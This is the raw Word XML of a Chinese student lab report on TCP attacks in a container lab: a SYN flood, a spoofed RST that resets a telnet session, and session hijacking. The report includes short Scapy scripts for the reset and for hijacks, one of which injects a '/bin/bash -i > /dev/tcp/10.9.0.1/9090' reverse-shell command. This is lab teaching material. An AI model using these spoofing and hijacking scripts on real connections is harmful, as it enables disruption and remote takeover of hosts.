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第二次实验实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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57118216 丰思飏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查看队列大小</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3797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队列情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1534795"/>
            <wp:effectExtent l="0" t="0" r="1143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关闭SYN cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="5911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查看dock信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4535170" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="1143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517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Victim未受攻击时netstat -nat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="863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未受攻击时Telnet成功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44770" cy="1976755"/>
            <wp:effectExtent l="0" t="0" r="1143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77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Victim受攻击后netstat -nat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2290445"/>
            <wp:effectExtent l="0" t="0" r="63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Victim受攻击后Telnet连接失败</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5332095" cy="709930"/>
            <wp:effectExtent l="0" t="0" r="190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证明攻击成功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Task2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用Wireshark获取用户1与受攻击者间的Telnet连接信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2502535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1206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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcp = TCP(sport=42158, dport=23, flags="R", seq=233777143)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>send(pkt,verbose=0)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攻击成功后连接断开</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="784860"/>
            <wp:effectExtent l="0" t="0" r="12065" b="254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Task3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用以下程序进行攻击，输入data为abcd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#!/usr/bin/env python3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from scapy.all import *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 = IP(src="10.9.0.6", dst="10.9.0.5")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tcp = TCP(sport=42248, dport=23, flags="A", seq=2527687370,ack=1880652555)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 = "abcd"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pkt = ip/tcp/data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ls(pkt)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send(pkt,verbose=0)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488315"/>
            <wp:effectExtent l="0" t="0" r="12065" b="698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18080"/>
            <wp:effectExtent l="0" t="0" r="1905" b="762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在报文中找到了数据abcd，证明成功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Task4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使用以下程序获取返回shell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#!/usr/bin/env python3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from scapy.all import *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ip = IP(src="10.9.0.6", dst="10.9.0.5")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tcp = TCP(sport=42296, dport=23, flags="A", seq=2116556609, ack=2751370190)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data = "/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1\r"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pkt = ip/tcp/data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ls(pkt)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send(pkt,verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4629150" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="6350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shell</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>返回成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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7A5A"/>
    <w:rsid w:val="01CC7085"/>
    <w:rsid w:val="034B295E"/>
    <w:rsid w:val="04EF3A16"/>
    <w:rsid w:val="05807DEB"/>
    <w:rsid w:val="075E68BD"/>
    <w:rsid w:val="08472806"/>
    <w:rsid w:val="08506F5D"/>
    <w:rsid w:val="08AF7E4A"/>
    <w:rsid w:val="0BD327A7"/>
    <w:rsid w:val="0C5959EA"/>
    <w:rsid w:val="11120F96"/>
    <w:rsid w:val="117164A2"/>
    <w:rsid w:val="139E3CE7"/>
    <w:rsid w:val="158D066D"/>
    <w:rsid w:val="17310C3D"/>
    <w:rsid w:val="19353043"/>
    <w:rsid w:val="1BDF013F"/>
    <w:rsid w:val="1E4408AD"/>
    <w:rsid w:val="219057D1"/>
    <w:rsid w:val="266A76EE"/>
    <w:rsid w:val="29206476"/>
    <w:rsid w:val="2CD660AA"/>
    <w:rsid w:val="2E472672"/>
    <w:rsid w:val="300A174F"/>
    <w:rsid w:val="33656B0A"/>
    <w:rsid w:val="34572191"/>
    <w:rsid w:val="36401F16"/>
    <w:rsid w:val="37303FEF"/>
    <w:rsid w:val="384749BF"/>
    <w:rsid w:val="3B5E7DF0"/>
    <w:rsid w:val="3E351CA1"/>
    <w:rsid w:val="47A1059F"/>
    <w:rsid w:val="4AB541FD"/>
    <w:rsid w:val="4D4D24E2"/>
    <w:rsid w:val="4D746D0A"/>
    <w:rsid w:val="508A4A25"/>
    <w:rsid w:val="52194943"/>
    <w:rsid w:val="52264ADD"/>
    <w:rsid w:val="52727D44"/>
    <w:rsid w:val="5B4940E2"/>
    <w:rsid w:val="5C232C54"/>
    <w:rsid w:val="5E332CA1"/>
    <w:rsid w:val="5EBB5500"/>
    <w:rsid w:val="604C20DA"/>
    <w:rsid w:val="60F30704"/>
    <w:rsid w:val="61755571"/>
    <w:rsid w:val="6331438B"/>
    <w:rsid w:val="64BE73E6"/>
    <w:rsid w:val="650442BF"/>
    <w:rsid w:val="652F3409"/>
    <w:rsid w:val="68047EEE"/>
    <w:rsid w:val="69366A2E"/>
    <w:rsid w:val="6B0E1179"/>
    <w:rsid w:val="6BFF2502"/>
    <w:rsid w:val="6C951DBC"/>
    <w:rsid w:val="6E356382"/>
    <w:rsid w:val="6F3D70DC"/>
    <w:rsid w:val="6FD6741D"/>
    <w:rsid w:val="733A7717"/>
    <w:rsid w:val="75231DF5"/>
    <w:rsid w:val="75576DB5"/>
    <w:rsid w:val="784708F5"/>
    <w:rsid w:val="7C0C61F4"/>
    <w:rsid w:val="7CB467F1"/>
    <w:rsid w:val="7D546EE4"/>
    <w:rsid w:val="7E672322"/>
    <w:rsid w:val="7FA04DC6"/>
    <w:rsid w:val="7FFD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299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2021-07-08T01:57:00Z</dcterms:created>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>丰思飏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-08T15:21:24Z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AFFC967D807C4D6594775A5D964A38BE</vt:lpwstr>
  </property>
</Properties>
</file>